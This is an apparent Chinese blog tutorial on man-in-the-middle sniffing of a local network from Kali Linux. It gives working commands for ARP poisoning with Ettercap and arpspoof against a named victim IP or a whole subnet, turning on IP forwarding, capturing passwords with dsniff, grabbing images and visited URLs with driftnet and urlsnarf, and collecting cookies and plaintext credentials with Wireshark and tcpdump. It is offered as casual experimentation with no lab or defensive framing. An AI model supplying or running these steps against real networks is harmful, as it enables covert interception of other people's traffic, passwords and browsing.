1. 程式人生 > >kalilinux內網嗅探,區域網監控記錄

kalilinux內網嗅探,區域網監控記錄

快過年了沒事瞎玩玩,2017有空玩玩kali。前提需要連結到無線網

一、Ettercap(Etter [人名] 埃特cap[kæp] 蓋;帽子)是一款嗅探工具,包含ARP欺騙,DNS,劫持,中間人攻擊,嗅探密碼等功能

(ettercap經常報錯ERROR 12 Cannot allocate memory,不知道怎麼解決哪位大神指教一下,求教)

開啟轉發,重新開啟一個命令列:
echo "1">/proc/sys/net/ipv4/ip_forward

進入Kali Linux啟動Sniffing/Spoofing>Network Sniffers>Ettercap 或者命令列  ettercap -G  啟動圖形介面
ARP(Address Resolution Protocol)即地址解析協議是根據IP地址獲取實體地址的一個TCP/IP協議。
1、切換到Sniff標籤,點選Unified sniffing…,選擇wlan0網路介面,(wlan0 是無線介面eth0 是有線介面)
2、Host標籤,點選Scan for hosts,很快,Ettercap就列出了所有該網路下的C類地址,點選192.168.1.102(被攻擊者IP)新增到Target 1,點選192.168.1.1(閘道器地址)新增到Target 2
3、設定中間人,Mitm->arp poisoning...->Sniff remote connections打對勾 點選確定
4、Start->Start sniffing 開始監聽
5、點view -- connections開始檢視連線:

命令列方式

ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,引數詳解:
-P  使用外掛
-T  使用基於文字介面
-q  啟動安靜模式(不回顯)
-M  啟動ARP欺騙攻擊
192.168.1.102/ 被攻擊的目標主機,第二個192.168.1.1閘道器ip

ettercap -i wlan0 -Tq -M arp:remote /192.168.1.100-253/ /192.168.1.1/
第一個/ / 中內容為所欺騙的目標,第二個為閘道器。 可寫//  //   裡面為空,表示全部欺騙。

二、arpspoof 進行arp欺騙

必須另外開啟終端 echo  1>/proc/sys/net/ipv4/ip_forward 進行IP流量轉發,不然被攻擊者無法上網

命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102 

嗅探密碼:dsniff -i wlan0

三、driftnet (drift 英 [drɪft] n.漂移,偏移;趨勢) 是一款簡單的圖片捕獲工具;urlsnarf捕獲url連結 

再開啟一個終端,輸入driftnet -i wlan0  彈出一個小方框等待獲取圖片

語法 : driftnet   [options]   [filter code]主要引數:

-b 捕獲到新的圖片時發出嘟嘟聲
-i  interface     選擇監聽介面
-f  file   讀取一個指定pcap資料包中的圖片
-p  不讓所監聽的介面使用混雜模式
-a  後臺模式:將捕獲的圖片儲存到目錄中(不會顯示在螢幕上)
-m number 指定儲存圖片數的數目
-d directory  指定儲存圖片的路徑
-x prefix  指定儲存圖片的字首名
使用舉例:讀取一個指定pcap資料包中的圖片 driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/


再開啟一個終端,輸入 urlsnarf -i wlan0 監聽瀏覽過的網頁日誌,等待獲取

五、 資料包捕獲工具

1、wireshark:命令列wireshark啟動,中間的Capture 選擇 wlan0 然後點選 Start,獲取cookie以及沒有加密的明文密碼
2、tcpdump:可以將網路中傳送的資料包完全截獲下來提供分析。支援針對網路層、協議、主機、網路或埠的過濾

命令列 tcpdump -i wlan0